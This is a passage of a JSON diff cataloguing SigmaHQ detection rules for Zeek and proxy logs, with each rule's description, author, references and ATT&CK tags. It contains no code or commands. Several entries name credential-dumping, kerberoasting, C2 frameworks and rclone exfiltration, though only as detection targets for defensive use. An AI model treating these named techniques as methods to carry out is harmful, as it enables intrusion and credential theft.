compromised via some brute force or remote exploit since it has 
been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." + ], + "filename": "zeek_rdp_public_listener.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://attack.mitre.org/techniques/T1021/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" + ], + "tags": [ + "attack.t1021.001" + ] + }, + "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", + "value": "Publicly Accessible RDP Service" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden, @neu5rn", + "creation_date": "2020/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", + "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL. 
Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", + "meta": { + "author": "Samir Bousseaden, @neu5ron", + "creation_date": "2020/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_impacket_secretdump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ] + }, + "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", + "value": "Possible Impacket SecretDump Remote Activity - Zeek" + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "creation_date": "2020/04/02", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "zeek_smb_converted_win_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", + "value": "First Time Seen Remote Named Pipe - Zeek" + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different 
psexec client other than sysinternal one", + "meta": { + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "creation_date": "2020/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_susp_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", + "value": "Suspicious PsExec Execution - Zeek" + }, + { + "description": "Detects known sensitive file extensions via Zeek", + "meta": { + "author": "Samir Bousseaden, @neu5ron", + "creation_date": "2020/04/02", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection" + ] + }, + "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", + "value": "Suspicious Access to Sensitive File Extensions - Zeek" + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "meta": { + "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", + "creation_date": "2020/04/02", + "falsepositive": [ + "Transferring 
sensitive files for legitimate administration work by legitimate administrator" + ], + "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ] + }, + "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", + "value": "Transferring Files with Credential Data via Network Shares - Zeek" + }, + { + "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "meta": { + "author": "sigma", + "creation_date": "2020/02/12", + "falsepositive": [ + "Normal enterprise SPN requests activity" + ], + "filename": "zeek_susp_kerberos_rc4.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", + "value": "Kerberos Network Traffic RC4 Ticket Encryption" + }, + { + "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", + "meta": { + "author": "Axel Olsson", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proxy_adv_ip_port_scanner_upd_check.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + 
"https://www.advanced-ip-scanner.com/", + "https://www.advanced-port-scanner.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1590" + ] + }, + "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", + "value": "Advanced IP/Port Scanner Update Check" + }, + { + "description": "Detects suspicious user agent string of APT40 Dropbox tool", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_apt40.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal research from Florian Roth", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", + "value": "APT40 Dropbox Tool User Agent" + }, + { + "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proxy_apt_domestic_kitten.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", + "value": "Domestic Kitten FurBall Malware Pattern" + }, + { + "description": "Detects Baby Shark C2 Framework communication patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/09", + "falsepositive": [ + "Unknown" + 
], + "filename": "proxy_baby_shark.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", + "value": "BabyShark Agent Pattern" + }, + { + "description": "Detects HTTP requests used by Chafer malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_chafer_malware.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fb502828-2db0-438e-93e6-801c7548686d", + "value": "Chafer Malware URL Pattern" + }, + { + "description": "Detects Malleable Amazon Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_amazon.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", + "value": 
"CobaltStrike Malleable Amazon Browsing Traffic Profile" + }, + { + "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_malformed_uas.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", + "value": "CobaltStrike Malformed UAs in Malleable Profiles" + }, + { + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_ocsp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "value": "CobaltStrike Malleable (OCSP) Profile" + }, + { + "description": "Detects Malleable OneDrive Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_onedrive.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + 
"https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" + }, + { + "description": "Detects WebDav DownloadCradle", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents", + "Legitimate WebDAV administration" + ], + "filename": "proxy_downloadcradle_webdav.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", + "value": "Windows WebDAV User Agent" + }, + { + "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/08", + "falsepositive": [ + "Software downloads" + ], + "filename": "proxy_download_susp_dyndns.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1105", + "attack.t1568" + ] + }, + "uuid": 
"195c1119-ef07-4909-bb12-e66f5e07bf3c", + "value": "Download from Suspicious Dyndns Hosts" + }, + { + "description": "Detects download of certain file types from hosts in suspicious TLDs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/07", + "falsepositive": [ + "All kinds of software downloads" + ], + "filename": "proxy_download_susp_tlds_blacklist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", + "value": "Download from Suspicious TLD" + }, + { + "description": "Detects executable downloads from suspicious remote systems", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "All kind of software downloads" + ], + "filename": "proxy_download_susp_tlds_whitelist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", + "value": "Download EXE from Suspicious TLD" + }, + { + "description": "Detects user agent and URI paths used by empire agents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/13", + "falsepositive": [ + "Valid requests 
with this exact user agent to server scripts of the defined names" + ], + "filename": "proxy_empire_ua_uri_combos.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/BC-SECURITY/Empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", + "value": "Empire UserAgent URI Combo" + }, + { + "description": "Detects suspicious empty user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_empty_ua.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/Carlos_Perez/status/883455096645931008", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", + "value": "Empty User Agent" + }, + { + "description": "Detects URL pattern used by iOS Implant", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ios_implant.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "https://twitter.com/craiu/status/1167358457344925696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.collection", + "attack.t1005", + "attack.t1119", + "attack.credential_access", + "attack.t1528", + "attack.t1552.001" + ] + }, + "uuid": 
"e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", + "value": "iOS Implant URL Pattern" + }, + { + "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_java_class_download.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", + "value": "Java Class Proxy Download" + }, + { + "description": "Detects Windows PowerShell Web Access", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents" + ], + "filename": "proxy_powershell_ua.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c8557060-9221-4448-8794-96320e6f3e74", + "value": "Windows PowerShell User Agent" + }, + { + "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_pwndrop.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": 
"No established product", + "refs": [ + "https://breakdev.org/pwndrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003" + ] + }, + "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", + "value": "PwnDrp Access" + }, + { + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/05", + "falsepositive": [ + "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "filename": "proxy_raw_paste_service_access.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003", + "attack.defense_evasion" + ] + }, + "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "value": "Raw Paste Service Access" + }, + { + "description": "Detects a flashplayer update from an unofficial location", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/10/25", + "falsepositive": [ + "Unknown flash download locations" + ], + "filename": "proxy_susp_flash_download_loc.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189", + "attack.execution", + "attack.t1204.002", + 
"attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", + "value": "Flash Player Update from Suspicious Location" + }, + { + "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": "proxy_telegram_api.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.002" + ] + }, + "uuid": "b494b165-6634-483d-8c47-2026a6c52372", + "value": "Telegram API Access" + }, + { + "description": "Detects Turla ComRAT patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_turla_comrat.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.g0010" + ] + }, + "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", + "value": "Turla ComRAT" + }, + { + "description": "Detects suspicious user agent strings 
used in APT malware in proxy logs", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_ua_apt.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", + "value": "APT User Agent" + }, + { + "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_bitsadmin_susp_ip.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", + "value": "Bitsadmin to Uncommon IP Server Address" + }, + { + "description": "Detects Bitsadmin connections to domains with uncommon TLDs", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/03/07", + "falsepositive": [ + "Rare programs that use Bitsadmin and update from regional TLDs e.g. 
.uk or .ca" + ], + "filename": "proxy_ua_bitsadmin_susp_tld.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", + "value": "Bitsadmin to Uncommon TLD" + }, + { + "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_cryptominer.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", + "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", + "value": "Crypto Miner User Agent" + }, + { + "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_frameworks.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", + "value": "Exploit Framework User Agent" + }, + { + "description": "Detects suspicious user agent strings user by hack tools in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_hacktool.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", + "value": "Hack Tool User Agent" + }, + { + "description": "Detects suspicious user agent strings used by malware in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_malware.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "https://perishablepress.com/blacklist/ua-2013.txt", + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" + ], + "tags": [ + "attack.command_and_control", + 
"attack.t1071.001" + ] + }, + "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", + "value": "Malware User Agent" + }, + { + "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/10/18", + "falsepositive": [ + "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" + ], + "filename": "proxy_ua_rclone.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://rclone.org/", + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", + "value": "Rclone Activity via Proxy" + }, + { + "description": "Detects suspicious malformed user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_susp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + 